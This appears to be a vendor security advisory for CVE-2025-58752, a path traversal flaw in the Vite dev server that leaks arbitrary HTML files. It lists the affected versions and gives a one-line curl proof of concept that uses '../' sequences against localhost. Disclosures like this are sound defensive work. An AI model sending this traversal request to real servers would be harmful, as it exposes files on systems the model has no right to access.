< Back

- Vite arbitrary remote HTML file leak

CVE-2025-58752 | CVSS 7.5

JFrog Severity:high

Discovered ByOri Hollanderof the JFrog Security Research Team

Published 15 Sep, 2025 | Last updated 15 Sep, 2025

Vite arbitrary remote HTML file leak

vite

>=7.1.0,<=7.1.4

>=7.0.0,<=7.0.6

>=6.0.0,<=6.3.5

<=5.4.19

This vulnerability allows a remote attacker to leak any HTML file on the system.

Assuming a vite server is running on localhost, and somefile.html exists at the root directory

curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../somefile.html'

No mitigations are supplied for this vulnerability

Fix PR

< Back